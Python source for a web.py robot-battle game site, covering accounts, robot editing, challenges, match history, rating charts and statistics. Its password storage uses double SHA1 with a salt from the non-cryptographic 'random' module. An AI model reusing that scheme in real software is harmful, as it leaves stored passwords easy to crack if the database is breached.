'/robot/(\d*)/(edit)', 'PageEditRobot',
'/robot/(\d*)/edit/mode/(normal)', 'PageSwitchEditMode',
'/robot/(\d*)/edit/mode/(vim)', 'PageSwitchEditMode',
'/robot/(\d*)/edit/(vim)', 'PageEditRobot',
'/robot/(\d*)/enable', 'PageEnableRobot',
'/robot/(\d*)/source', 'PageRobotSource',
'/robot/(\d*)/test', 'PageRobotTest',
'/robot/new', 'PageNewRobot',
'/robot/new(acc)', 'PageNewRobot',
'/robot/stats', 'PageRobotStats',
'/stats', 'PageStats',
'/update/prefs', 'PageUpdatePrefs',
'/user/(\d*)', 'PageViewUser',
# static pages
'/(api)', 'PageStatic',
'/(compdir)', 'PageStatic',
'/(credits)', 'PageStatic',
'/(email)', 'PageStatic',
'/(faq)', 'PageStatic',
'/(gettingstarted)', 'PageStatic',
'/(kit)', 'PageStatic',
'/(moreexamples)', 'PageStatic',
'/(namerules)', 'PageStatic',
'/(rgdocs)', 'PageStatic',
'/(rules)', 'PageStatic',
'/(security)', 'PageStatic',
)
app = web.application(urls, globals())
def debuggable_session(app):
if web.config.get('_sess') is None:
sess = web.session.Session(app, web.session.DiskStore('sessions'))
web.config._sess = sess
return sess
return web.config._sess
sess = debuggable_session(app)
def hash(data):
return hashlib.sha1(data).hexdigest()
def generate_salt(length=10):
random.seed()
pool = string.ascii_uppercase + string.ascii_lowercase + string.digits
return ''.join(random.choice(pool) for i in range(length))
def logged_in(sess):
if 'logged_in' in sess:
if sess.logged_in:
if sess.user_id:
db.update('users', where='id=$id', vars={'id': sess.user_id},
last_active=int(time.time()))
# Change this to manual swap when added
db.update('robots', where='user_id=$id',
vars={'id': sess.user_id}, automatch=True)
return sess.user_id
return False
def force_login(sess, page='/reg', check_logged_in=False):
user_id = logged_in(sess)
if check_logged_in:
# Redirect if logged in
if user_id:
raise web.seeother(page)
else:
# Redirect if not logged in
if not user_id:
raise web.seeother(page)
return user_id
def username_exists(username):
result = db.select('users',
what='1',
where='username=$username',
vars={'username': username},
limit=1)
return bool(result)
def create_user(username, password, **params):
pw_hash = hash(password)
pw_salt = generate_salt()
pw_hash = hash(pw_hash+pw_salt)
return db.insert('users', username=username, pw_hash=pw_hash, pw_salt=pw_salt, **params)
def authenticate_user(username, password):
users = db.select('users', where='username = $username', vars={'username': username},
what='id, pw_hash, pw_salt')
if not users:
return False
user = users[0]
if hash(hash(password) + user['pw_salt']) == user['pw_hash']:
return user['id']
return False
def login_user(sess, user_id):
if logged_in(sess):
return False
sess.logged_in = True
sess.user_id = user_id
return True
def logout_user(sess):
sess.kill()
def template_closure(directory):
global settings
templates = web.template.render(
directory,
globals={
'sess': sess,
'settings': settings,
'tplib': tplib,
},
)
def render(name, *params, **kwargs):
return getattr(templates, name)(*params, **kwargs)
return render
tpl = template_closure('t/')
def ltpl(*params, **kwargs):
return tpl('layout', tpl(*params, **kwargs))
def lmsg(msg):
return tpl('layout', '<div class="prose">{0}</div>'.format(msg))
db = dbcon.connect_db()
######################
def encode_history_json(hist):
hist = json.dumps(hist)
hist = 'replay_callback({0});'.format(hist)
return hist.encode('base64')
def get_match_data(mid):
history_data = db.select('history', what='data', where='match_id=$id',
vars={'id': mid})
if history_data:
data = history_data[0]['data']
if data:
data = shorten.loads(data)
data['history'] = encode_history_json(data['history'])
return data
return None
def get_last_matches(num, min_rating=None):
mr = ''
if min_rating:
mr = ' and r1.rating >= $r and r2.rating >= $r'
query = '''
select
matches.*,
r1.compiled_code as r1_code, r2.compiled_code as r2_code,
r1.name as r1_name, r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where state = {0} {1}
order by timestamp desc
limit $num'''.format(ms.DONE, mr)
matches = db.query(query, vars={'num': num, 'r': min_rating})
return matches if matches else None
def get_latest_match(min_rating=None):
matches = get_last_matches(1, min_rating)
if matches:
return matches[0]
return None
class PageHome:
def GET(self):
if logged_in(sess):
return ltpl('home')
rating = 3000.0
match = get_latest_match(rating)
if match:
match.data = get_match_data(match['id'])
recent = get_last_matches(5, rating)
return ltpl('home', match, recent)
class PageLogin:
_form = web.form.Form(
web.form.Textbox('username', description='Username'),
web.form.Password('password', description='Password'),
web.form.Button('Login')
)
def GET(self):
force_login(sess, '/robots', True)
form = self._form()
return ltpl('login', form)
def POST(self):
form = self._form()
if not form.validates():
return 'bad input'
if not form.d.username or not form.d.password:
return 'you have to enter a username and password'
user_id = authenticate_user(form.d.username, form.d.password)
if not user_id:
return 'couldn\'t authenticate user'
login_user(sess, user_id)
raise web.seeother('/robots')
class PageRegister:
_form = web.form.Form(
web.form.Textbox('username', description='Username'),
web.form.Password('password', description='Password'),
web.form.Button('Register')
)
def GET(self):
force_login(sess, '/robots', True)
form = self._form()
return ltpl('reg', form)
def POST(self):
form = self._form()
if not form.validates():
return 'bad input'
if not form.d.username or not form.d.password:
return 'you have to enter a username and password'
if username_exists(form.d.username):
return 'username already exists'
user_id = create_user(form.d.username, form.d.password)
if not user_id:
return 'couldn\'t create user'
login_user(sess, user_id)
raise web.seeother('/robot/new')
class PageLogout:
def GET(self):
logout_user(sess)
raise web.seeother('/')
class PageRobots:
def GET(self):
force_login(sess)
query = '''
select *,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
where user_id = $user_id and not deleted and
disabled = $disabled
order by rating desc nulls last'''
robots = db.query(
query, vars={'user_id': sess.user_id, 'disabled': False})
disabled_robots = db.query(
query, vars={'user_id': sess.user_id, 'disabled': True})
return ltpl('robots', robots, disabled_robots)
def check_name(s):
for ch in s:
if ch in string.printable and ch not in string.whitespace:
return True
return False
def count_robots(user_id):
result = db.select(
'robots', what='count(*)',
where='user_id=$user_id and not disabled',
vars={'user_id': user_id})
return result[0]['count'] if result else None
class PageNewRobot:
_form = web.form.Form(
web.form.Textbox('name'))
def GET(self, new_acc=None):
force_login(sess)
robot_count = count_robots(sess.user_id)
user = db.select('users', what='extra_bots', where='id=$id',
vars={'id': sess.user_id})
robot_limit = ROBOTS_LIMITS
if user:
robot_limit += user[0]['extra_bots']
if robot_count >= robot_limit:
return lmsg(BOT_LIMIT_REACHED_MSG.format(robot_limit))
top_robots = list(db.select('robots',
what='id, name, rating, open_source',
where='compiled and passed and not disabled and rating is not NULL',
order='rating desc',
limit=6))
return ltpl('newrobot', bool(new_acc), top_robots)
def POST(self, new_acc=None):
force_login(sess)
robot_count = count_robots(sess.user_id)
user = db.select('users', what='extra_bots', where='id=$id',
vars={'id': sess.user_id})
robot_limit = ROBOTS_LIMITS
if user:
robot_limit += user[0]['extra_bots']
if robot_count >= robot_limit:
return lmsg(BOT_LIMIT_REACHED_MSG.format(robot_limit))
form = self._form()
if not form.validates():
return 'bad input'
form.d.name = form.d.name.strip()
if not form.d.name:
return lmsg('You have to enter a name.')
if not check_name(form.d.name):
return lmsg('Please have at least one printable, non-whitespace ASCII character in your name.')
if len(form.d.name) > MAX_NAME_LENGTH:
return lmsg(
'Please limit your name to {0} characters.'.format(
MAX_NAME_LENGTH))
code = '''import rg
class Robot:
def act(self, game):
# return something
pass'''
rid = db.insert('robots',
user_id=sess.user_id,
name=form.d.name,
code=code)
raise web.seeother('/robot/{0}/edit'.format(rid))
def get_robot(rid, check_user_id=True):
where = 'id=$id'
vars = {'id': rid}
if check_user_id and not tplib.is_admin(sess):
where += ' and user_id=$user_id'
vars['user_id'] = sess.user_id
result = db.select('robots', where=where, vars=vars)
return result[0] if result else None
class PageSwitchEditMode:
def GET(self, rid, edit_mode):
if edit_mode == 'vim':
web.setcookie('vim', 'yes', 480984220)
raise web.seeother('/robot/' + rid + '/edit/vim')
web.setcookie('vim', 'no', -1)
raise web.seeother('/robot/' + rid + '/edit')
class PageEditRobot:
_form = web.form.Form(
web.form.Textbox('name'),
web.form.Textarea('code'),
web.form.Checkbox('open_source'),
web.form.Button('save'))
def first_time(self):
result = db.select('robots',
what='count(*)',
where='compiled and user_id = $user_id',
vars={'user_id': sess.user_id})
if result and result[0]['count'] == 0:
return True
user = db.select('users',
what='registered_on',
where='id = $id',
vars={'id': sess.user_id})
if user and time.time() - user[0]['registered_on'] < tools.DAY:
return True
return False
def GET(self, rid, edit_mode):
force_login(sess)
vim_cookie = web.cookies().get('vim')
if vim_cookie == 'yes' and edit_mode != 'vim':
raise web.seeother('/robot/' + rid + '/edit/vim')
if vim_cookie == 'no' and edit_mode == 'vim':
raise web.seeother('/robot/' + rid + '/edit')
rid = int(rid)
robot = get_robot(rid)
if not robot:
return lmsg('That robot does not exist.')
first = self.first_time()
db.update('robots',
where='id=$id',
vars={'id': rid},
saved=False)
return ltpl('editrobot', robot, edit_mode == 'vim', first)
def POST(self, rid, edit_mode):
force_login(sess)
rid = int(rid)
robot = get_robot(rid)
if not robot:
return lmsg('Robot does not exist.')
form = self._form(robot)
if not form.validates():
return lmsg('Bad input.')
form.d.name = form.d.name.strip()
if not form.d.name:
return lmsg('You have to enter a name.')
if not check_name(form.d.name):
return lmsg('Please have at least one printable and ' +
'non-whitespace ASCII character in your name.')
if len(form.d.name) > MAX_NAME_LENGTH:
return lmsg(
'Please limit your name to {0} characters.'.format(
MAX_NAME_LENGTH))
if len(form.d.code) > 250000:
return lmsg('Please limit your code to 250,000 characters.')
robot_code = form.d.code
db.update('robots',
where='id=$id',
vars={'id': rid},
name=form.d.name,
code=robot_code,
open_source=form.d.open_source)
robot = get_robot(rid)
if not robot:
return lmsg('Robot does not exist.')
compiled_code = robot_code
if robot.rating is not None:
rating = robot.rating
else:
rating = settings.default_rating
db.update('robots',
where='id=$id',
vars={'id': rid},
last_updated=int(time.time()),
last_rating=rating,
compiled_code=compiled_code,
changed_since_sbtest=True,
saved=True,
passed=True,
compiled=True)
raise web.seeother('/robot/{0}/edit'.format(robot.id))
MATCHES_PER_PAGE = 20
class PageRedirectViewRobot:
def GET(self, rid):
raise web.redirect('/robot/{0}'.format(rid))
class PageRedirectViewUser:
def GET(self, uid):
raise web.redirect('/user/{0}'.format(uid))
class PageRedirectRobotSource:
def GET(self, rid):
raise web.redirect('/robot/{0}/source'.format(rid))
class PageViewRobot:
def get_robot(self, rid):
query = '''
select
robots.id, user_id, name, disabled, last_updated, deleted,
rating, users.about, open_source, priority, time,
length(compiled_code) as len, fast, short, winrate, automatch,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
join users on users.id = robots.user_id
where robots.id = $id'''
robot = db.query(query, vars={'id': rid})
return robot[0] if robot else None
def GET(self, rid, against=None):
robot = self.get_robot(int(rid))
if not robot:
return lmsg('Robot not found.')
query = '''
select
matches.*,
r1.name as r1_name,
r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where (r1.id = $id or r2.id = $id)
and (state = {0} or state = {1})
order by matches.id desc
'''.format(ms.WAITING, ms.RUNNING)
next_matches = db.query(query, vars={'id': rid})
latest_match = get_latest_match()
query = '''
select
matches.*,
r1.name as r1_name,
r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where (r1_id = $id or r2_id = $id)
and (state = {0} or state = {1})
order by timestamp desc
LIMIT {2}
'''.format(ms.ERROR, ms.DONE, 5)
matches = db.query(
query, vars={'id': rid})
challenges = 0
if logged_in(sess):
result = db.select('users',
what='challenges',
where='id=$id',
vars={'id': sess.user_id})
if result:
challenges = CHALLENGES_LIMITS - result[0]['challenges']
return ltpl('viewrobot', robot, matches, next_matches,
latest_match.id if latest_match else None, challenges)
class PageRobotHistory:
def get_robot(self, rid):
query = '''
select
robots.id, user_id, name, disabled, last_updated, deleted,
rating, users.about, open_source, priority, time,
length(compiled_code) as len, fast, short, winrate, automatch,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
join users on users.id = robots.user_id
where robots.id = $id'''
robot = db.query(query, vars={'id': rid})
return robot[0] if robot else None
def GET(self, rid, against=None):
robot = self.get_robot(int(rid))
if not robot:
return lmsg('Robot not found.')
opponent = None
if against is not None:
opponent = self.get_robot(int(against))
if not opponent:
return lmsg('Robot against not found.')
#robot.about = self.convert_links(robot.about)
params = web.input(page=None, ranked=None, per=None)
page = int(params.page or 0)
ranked = int(params.ranked or 0)
per = int(params.per or MATCHES_PER_PAGE)
if per > 200 and not tplib.is_admin(sess):
per = 200
ranked = 'and ranked' if ranked > 0 else 'and not ranked' if ranked < 0 else ''
if against is None:
query = '''
select
matches.*,
r1.name as r1_name,
r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where (r1_id = $id or r2_id = $id)
and (state = {0} or state = {1})
{3}
order by timestamp desc
limit {2}
offset $page'''.format(ms.ERROR, ms.DONE, per,
ranked)
matches = db.query(
query, vars={'id': rid, 'page': page * per})
else:
query = '''
select
matches.*,
r1.name as r1_name,
r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where ((r1_id = $id1 and r2_id = $id2) or
(r1_id = $id2 and r2_id = $id1))
and (state = {0} or state = {1})
{3}
order by timestamp desc
limit {2}
offset $page'''.format(ms.ERROR, ms.DONE, per,
ranked)
matches = db.query(
query,
vars={
'id1': rid,
'id2': against,
'page': page * per
})
return ltpl('robot_history', robot, matches, page, per, against,
params.ranked)
class PageViewUser:
def get_user_detailed(self, uid):
query = '''
select
*, coalesce(r.count, 0) as robot_count
from users
left join (
select
user_id as uid, count(*) as count
from robots
where not robots.disabled
group by user_id
) as r
on r.uid = users.id
where users.id = $id'''
user = db.query(query, vars={'id': uid})
return user[0] if user else None
def get_robots(self, uid, disabled=False):
query = '''
select
*,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
where robots.user_id = $id and disabled = $disabled and not deleted
order by robots.rating desc nulls last
'''
robots = db.query(query, vars={'id': uid, 'disabled': disabled})
return robots if robots else []
def get_user(self, uid):
query = '''
select id, about, last_active, registered_on
from users
where id = $id'''
user = db.query(query, vars={'id': uid})
return user[0] if user else None
def GET(self, uid=None):
if uid is None or ('user_id' in sess and int(uid) == sess.user_id):
uid = force_login(sess)
user = self.get_user_detailed(int(uid))
user.robots_limit = ROBOTS_LIMITS + user.extra_bots
user.challenges_limit = CHALLENGES_LIMITS
else:
user = self.get_user(int(uid))
if not user:
return lmsg('User not found.')
robots = self.get_robots(int(uid))
disabled_robots = self.get_robots(int(uid), True)
return ltpl('viewuser', user, robots, disabled_robots)
def get_match(mid):
query = '''
select
matches.*,
r1.compiled_code as r1_code, r2.compiled_code as r2_code,
r1.name as r1_name, r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where matches.id = $id'''
match = db.query(query, vars={'id': mid})
return match[0] if match else None
def get_pending_matches():
query = '''
select
matches.*,
r1.compiled_code as r1_code, r2.compiled_code as r2_code,
r1.name as r1_name, r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where state = {0} and not ranked'''.format(ms.WAITING)
return db.query(query)
class PageChallengeRobot:
def match_running(self, rid, challenger):
result = db.select('matches',
what='id',
where='''
(r1_id = $id1 and r2_id = $id2 or
r1_id = $id2 and r2_id = $id1)
and (state = {0} or state = {1})
'''.format(ms.WAITING, ms.RUNNING),
vars={'id1': rid, 'id2': challenger})
return result[0].id if result else None
def eligible(self, rid):
result = db.select(
'robots', what='count(*)',
where='passed and compiled and not deleted and id=$id',
vars={'id': rid})
return result and result[0]['count'] > 0
def is_self(self, rid):
result = db.select('robots', what='user_id', where='id=$id', vars={'id': rid})
return (result and result[0]['user_id'] == sess.user_id)
def get_rating(self, rid):
result = db.select('robots', what='rating', where='id=$id', vars={'id': rid})
return result[0]['rating']
def limit_ok(self, user_id, num_matches):
result = db.select('users',
what='challenges',
where='id=$id',
vars={'id': user_id})
if result:
result = result[0]
return result['challenges'] + num_matches <= CHALLENGES_LIMITS
return False
def GET(self, rid, challenger=None, num_matches=None):
force_login(sess)
rid = int(rid)
if self.is_self(rid):
return lmsg('You can\'t challenge one of your own robots.')
if num_matches is None:
num_matches = 1
else:
num_matches = int(num_matches)
if not self.limit_ok(sess.user_id, num_matches):
return lmsg('''
You <a href="/profile"><b>don't have enough challenges</b></a>
left today! The counts are reset everyday at midnight EST.
<br/><br/>''')
if challenger is None:
robots = db.select(
'robots',
where='user_id=$id and compiled and passed and not deleted',
vars={'id':sess.user_id})
return ltpl('choosechallenge', rid, robots)
challenger = int(challenger)
if not self.is_self(challenger):
return lmsg('You can only challenge others with your robots.')
if not self.eligible(rid):
return lmsg('The enemy is not eligible to fight.')
if not self.eligible(challenger):
return lmsg('Your robot is not eligible to fight.')
# create match
for l in range(num_matches):
if random.random() < 0.5:
match_id = db.insert(
'matches', r1_id=rid, r2_id=challenger,
ranked=False, r1_rating=self.get_rating(rid),
r2_rating=self.get_rating(challenger),
seed=random.randint(1, settings.max_seed))
else:
match_id = db.insert(
'matches', r2_id=rid, r1_id=challenger,
ranked=False, r2_rating=self.get_rating(rid),
r1_rating=self.get_rating(challenger),
seed=random.randint(1, settings.max_seed))
# add to user's challenges count
db.query('UPDATE users SET challenges=challenges+$c WHERE id=$id',
vars={'id': sess.user_id, 'c': num_matches})
if num_matches == 1:
raise web.seeother('/match/{0}'.format(match_id))
else:
raise web.seeother('/robot/{0}'.format(rid))
class PageMatchList:
def GET(self):
recent = get_last_matches(100)
query = '''
select
matches.*,
r1.name as r1_name,
r2.name as r2_name
from matches
join robots r1 on r1.id = matches.r1_id
join robots r2 on r2.id = matches.r2_id
where (state = {0} or state = {1})
order by matches.id desc
'''.format(ms.WAITING, ms.RUNNING)
next_matches = db.query(query)
return ltpl('matchlist', recent, next_matches)
class PageMatch:
def GET(self, mid):
match = get_match(int(mid))
if not match:
return 'match not found'
match.data = get_match_data(match['id'])
has_match_log = time.time() - match.timestamp < tools.WEEK
return ltpl('match', match, has_match_log)
class PageStatic:
def GET(self, page):
return ltpl(page)
PER_PAGE = 20
class PageDirectory:
def get_ranking(self, rating, where=''):
if rating is None:
count = db.select('robots',
what='count(*)',
where='''compiled and passed and not disabled
and rating is not NULL {0}'''.format(where))
else:
count = db.select('robots',
what='count(*)',
where='''compiled and passed and not disabled
and rating > $rating + 1e-5 {0}'''.format(where),
vars={'rating': rating})
return count[0]['count'] if count else None
def GET(self):
params = web.input(upper=None, page=None, latest=None, os=None,
diff=None, pri=None, viewactive=None, fast=None,
time=None, short=None, disabled=None, tlimit=None,
win=None, per=None)
params.diff = int(params.diff or 0)
if params.latest:
order = 'last_updated desc'
elif params.diff > 0:
order = 'rating-last_rating desc nulls last'
elif params.diff < 0:
order = 'rating-last_rating asc nulls first'
elif params.pri:
order = 'priority desc'
elif params.time:
order = 'time desc'
elif params.win:
order = 'winrate ' + ('desc' if int(params.win) > 0 else 'asc')
else:
order = 'rating desc nulls last'
per = int(params.per or PER_PAGE)
if per > 200 and not tplib.is_admin(sess):
per = 200
os_where = ' and not disabled' if not params.disabled else ''
os_where += ' and open_source' if params.os else ''
os_where += ' and automatch' if params.viewactive else ''
t = 2 if not params.tlimit else float(params.tlimit)
os_where += ' and time < {0}'.format(t) if params.fast else ''
os_where += ' and length(compiled_code) < 1000' if params.short else ''
page = int(params.page or 0)
os_what = '''id, user_id, name, rating, open_source, automatch,
last_updated, last_rating, fast, short, winrate'''
if params.upper == '':
upper = None
robots = list(db.select('robots',
what=os_what,
where='''compiled and rating is NULL and passed
and not deleted {0}'''.format(os_where),
order=order,
limit=per,
offset=page*per,
vars=locals()))
else:
if params.upper is None and 'logged_in' in sess and sess.user_id:
my_robots = list(db.select('robots',
what='rating',
where='''compiled and rating is not NULL and passed
and not deleted and user_id=$user_id
{0}'''.format(os_where),
order=order,
vars={'user_id': sess.user_id}))
if not my_robots:
top_rating = settings.default_rating
else:
top_rating = my_robots[0].rating
my_rank = self.get_ranking(top_rating, os_where)
goal_rank = max(0, my_rank - (per - 1) / 2)
#print top_rating, my_rank, goal_rank
left, right = int(top_rating), 10000
while left < right:
#print left, right
mid = (left + right + 1) / 2
cur_rank = self.get_ranking(mid, os_where)
if cur_rank > goal_rank:
left = mid
elif cur_rank < goal_rank:
right = mid - 1
else:
left = mid
break
upper = left
else:
upper = float(params.upper or 1000000)
robots = list(db.select('robots',
what=os_what,
where='''compiled and passed and not deleted
and (rating <= $upper or rating is NULL) {0}'''.format(os_where),
order=order,
limit=per,
offset=page*per,
vars=locals()))
start_ranking = 0
if robots:
start_ranking = self.get_ranking(robots[0].rating, os_where)
return ltpl('directory', robots, upper, start_ranking, page, per,
params.latest, params.os, params.diff, params.viewactive,
params.fast, params.short)
class PageStats:
def count_users_registered(self):
count = db.select('users',
what='count(*)',
where='registered_on > $time',
vars={'time': time.time() - tools.MONTH})
return count[0]['count'] if count else 0
def count_users_period(self, period):
count = db.select('users',
what='count(*)',
where='last_active > $time',
vars={'time': time.time() - period})
return count[0]['count'] if count else 0
def count_users_month(self):
return self.count_users_period(tools.MONTH)
def count_users_week(self):
return self.count_users_period(tools.WEEK)
def count_users_with_passing_robots(self):
users = db.select('robots',
what='1',
where='compiled and passed and not disabled and automatch',
group='user_id')
return len(users) if users else None
def count_users_with_robots(self):
users = db.select('robots',
what='1',
where='compiled and not disabled and automatch',
group='user_id')
return len(users) if users else None
def count_robots_not_disabled(self):
count = db.select('robots',
what='count(*)',
where='not disabled and automatch')
return count[0]['count'] if count else 0
def count_robots_compiled(self):
count = db.select('robots',
what='count(*)',
where='compiled and not disabled and automatch')
return count[0]['count'] if count else 0
def count_robots_passing(self):
count = db.select('robots',
what='count(*)',
where='compiled and passed and not disabled and automatch')
return count[0]['count'] if count else 0
def count_robots_available(self):
count = db.select('robots',
what='count(*)',
where='compiled and passed and not disabled')
return count[0]['count'] if count else 0
def count_robots_updated(self):
count = db.select('robots',
what='count(*)',
where='''compiled and passed and not disabled
and last_updated > $time''',
vars={'time': time.time() - tools.MONTH})
return count[0]['count'] if count else 0
def count_matches(self):
match_count = db.select('matches', what='count(*)',
where='state={0}'.format(ms.DONE))
return match_count[0]['count'] if match_count else None
def count_histories(self):
match_count = db.select('history', what='count(*)')
return match_count[0]['count'] if match_count else None
def average_rating(self):
result = db.select('robots', what='AVG(rating)',
where='passed and compiled and not disabled')[0]['avg']
return int(result) if result is not None else 0
def count_matchmaker_processes(self):
pipes = subprocess.Popen(['ps', 'uxaf'], stdout=subprocess.PIPE)
processes = pipes.stdout.readlines()
scripts = ('matchmaker',)
counts = dict((x, dict(root=0, nobody=0)) for x in scripts)
for process in processes:
for script in scripts:
if ('python {0}.py'.format(script)) not in process:
continue
for user in ('root', 'nobody'):
if user in process:
counts[script][user] += 1
break
return counts
def GET(self):
info = [
'count_users_registered',
'count_users_month',
'count_users_with_robots',
'count_users_with_passing_robots',
'count_robots_available',
'count_robots_not_disabled',
'count_robots_compiled',
'count_robots_passing',
'count_robots_updated',
'count_matches',
'count_histories',
'average_rating']
return ltpl('stats', *[getattr(self, x)() for x in info])
class PageRobotStats:
def GET(self):
robots = db.select(
'robots',
what='id, user_id, rating, name, automatch, disabled',
where='compiled and passed')
bots = []
for robot in robots:
bots.append({
'id': robot.id,
'user_id': robot.user_id,
'rating': robot.rating,
'name': robot.name,
'automatch': robot.automatch,
'disabled': robot.disabled,
})
return json.dumps(bots)
DEFAULT_PERIOD = tools.MONTH
class PageRobotCharts:
def get_robot(self, rid):
query = '''
select
robots.id, user_id, name, disabled, last_updated, deleted,
rating, users.about, open_source, priority, time,
length(compiled_code) as len, fast, short, winrate, automatch,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
join users on users.id = robots.user_id
where robots.id = $id'''
robot = db.query(query, vars={'id': rid})
return robot[0] if robot else None
def get_chart_data(self, robot, full=None):
if full:
oldest = 0
else:
oldest = int(time.time() - DEFAULT_PERIOD)
chart_data = None
query1 = '''
select
timestamp, r1_rating as rating, r1_ranking as ranking
from matches
where r1_id = $id and ranked and state = 3 and timestamp > $t'''
query2 = '''
select
timestamp, r2_rating as rating, r2_ranking as ranking
from matches
where r2_id = $id and ranked and state = 3 and timestamp > $t'''
rating_data = []
ranking_data = []
max_rating = 0
max_timestamp = 0
for query in [query1, query2]:
for pair in db.query(query, vars={'id': robot.id, 't': oldest}):
rating_data.append(
(pair.timestamp * 1000, pair.rating))
if pair.rating > max_rating:
max_rating, max_timestamp = pair.rating, pair.timestamp
if pair.ranking is not None:
ranking_data.append(
(pair.timestamp * 1000, pair.ranking + 1))
rating_data.sort(key=lambda x: x[0])
ranking_data.sort(key=lambda x: x[0])
query = '''
select floor(rating/100) as r, count(*) as n from robots
where passed and compiled and not disabled and rating is not null
group by r order by r desc
'''
group_data = []
for group in db.query(query):
group_data.append((group.r * 100, group.n))
chart_data = [
{
'data': rating_data,
'label': 'ELO Rating',
'color': 'black',
},
]
chart_data.append(
{
'data': ranking_data,
'label': 'Overall Rank',
'color': 'darkcyan',
'yaxis': 2,
},
)
chart_data = '''
var data = {0};
var last_updated = {1};
var cur_rating = {3};
var gdata = {2};
var max_rating = {4};
var max_timestamp = {5};
'''.format(json.dumps(chart_data),
robot.last_updated * 1000,
json.dumps(group_data),
robot.rating or settings.default_rating,
max_rating,
max_timestamp * 1000)
chart_data = chart_data.encode('base64')
return chart_data
def GET(self, rid, against=None):
robot = self.get_robot(int(rid))
if not robot:
return lmsg('Robot not found.')
params = web.input(full=None)
chart_data = self.get_chart_data(robot, params.full)
return ltpl('robotcharts', robot, chart_data, params.full)
class PageStaticBlank:
def GET(self, page):
return tpl(page)
class PageProfile:
_form = web.form.Form(
web.form.Textarea('about'))
def get_user(self, uid):
query = '''
select id, about
from users
where id = $id'''
user = db.query(query, vars={'id': uid})
return user[0] if user else None
def GET(self):
force_login(sess)
user = self.get_user(sess.user_id)
if not user:
return lmsg('Your account was not found.')
return ltpl('profile', user)
def POST(self):
force_login(sess)
form = self._form()
if not form.validates():
return lmsg('Invalid input.')
if len(form.d.about) > 5000:
return lmsg('Please limit your profile to fewer than 5,000 characters.')
db.update('users', where='id=$id', about=form.d.about, vars={'id': sess.user_id})
raise web.seeother('/user/{0}'.format(sess.user_id))
class PageRobotTest:
def GET(self, rid):
rid = int(rid)
robot = get_robot(rid, check_user_id=False)
if not robot or not tplib.is_admin(sess):
return lmsg('That robot was not found.')
query = '''
select
*
from robots
where open_source and compiled and passed and
rating > $rating - 100
order by robots.rating desc
'''
# only robots with greater rating can be possibly copied
os_robots = db.query(query, vars={'rating': robot.rating})
shortest = None
minlen = None
for os_robot in os_robots:
os_code = os_robot.code.splitlines(True)
code = robot.code.splitlines(True)
if len(os_code) > 1.5 * len(code) or len(code) > 1.5 * len(os_code):
continue
ud = difflib.ndiff(os_code, code)
ud = [line for line in ud if line[:2] != '? ']
if shortest is None or len(ud) - len(os_code) < minlen:
minlen = len(ud) - len(os_code)
shortest = ud
if shortest is not None:
return tpl(
'robotsource',
pygments.highlight(
''.join(shortest),
pygments.lexers.text.DiffLexer(),
pygments.formatters.HtmlFormatter()),
robot.name)
else:
return lmsg('No similarities found.')
class PageRobotSource:
def GET(self, rid):
rid = int(rid)
robot = get_robot(rid, check_user_id=False)
if not robot:
return lmsg('That robot was not found.')
if robot.open_source or (logged_in(sess) and sess.user_id == robot.user_id) or tplib.is_admin(sess):
web.header('Content-Type', 'text/html')
return tpl(
'robotsource',
pygments.highlight(
robot.compiled_code,
pygments.lexers.PythonLexer(),
pygments.formatters.HtmlFormatter()),
robot.name,
robot.open_source)
raise web.seeother('/robot/{0}'.format(rid))
def get_robot_with_ranking(rid):
where = 'id=$id'
vars = {'id': rid}
if not (logged_in(sess) and sess.user_id == 1):
where += ' and user_id=$user_id'
vars['user_id'] = sess.user_id
query = '''
select *,
(select count(*) from robots r where compiled and passed and
not disabled and r.rating > robots.rating + 1e-5) as ranking
from robots
where {0}'''.format(where)
result = db.query(query, vars=vars)
return result[0] if result else None
class PageDisableRobot:
def GET(self, rid):
force_login(sess)
rid = int(rid)
robot = get_robot(rid)
if not robot:
return lmsg('That robot was not found.')
if tplib.is_admin(sess):
db.update('robots',
where='id=$id',
vars={'id': rid},
disabled=True)
raise web.seeother('/robot/{0}'.format(rid))
else:
db.update('robots',
where='id=$id and user_id=$user_id',
vars={'id': rid, 'user_id': sess.user_id},
disabled=True)
raise web.seeother('/robots')
class PageEnableRobot:
def GET(self, rid):
force_login(sess)
rid = int(rid)
robot = get_robot(rid)
if not robot:
return lmsg('That robot was not found.')
if tplib.is_admin(sess):
db.update('robots',
where='id=$id',
vars={'id': rid},
disabled=False)
raise web.seeother('/robot/{0}'.format(rid))
else:
robot_count = count_robots(sess.user_id)
user = db.select('users', what='extra_bots', where='id=$id',
vars={'id': sess.user_id})
robot_limit = ROBOTS_LIMITS
if user:
robot_limit += user[0]['extra_bots']
if robot_count >= robot_limit:
return lmsg(BOT_LIMIT_REACHED_MSG.format(robot_limit))
db.update('robots',
where='id=$id and user_id=$user_id',
vars={'id': rid, 'user_id': sess.user_id},
disabled=False)
return web.seeother('/robots')
class PageDeleteRobot:
def GET(self, rid):
force_login(sess)
rid = int(rid)
robot = get_robot(rid)
if not robot:
return lmsg('That robot was not found.')
return ltpl('delrobot', robot)
def POST(self, rid):
force_login(sess)
rid = int(rid)
if tplib.is_admin(sess):
db.update('robots',
where='id=$id',
vars={'id': rid},
disabled=True,
deleted=True)
raise web.seeother('/robot/{0}'.format(rid))
else:
db.update('robots',
where='id=$id and user_id=$user_id',
vars={'id': rid, 'user_id': sess.user_id},
disabled=True,
deleted=True)
raise web.seeother('/robots')
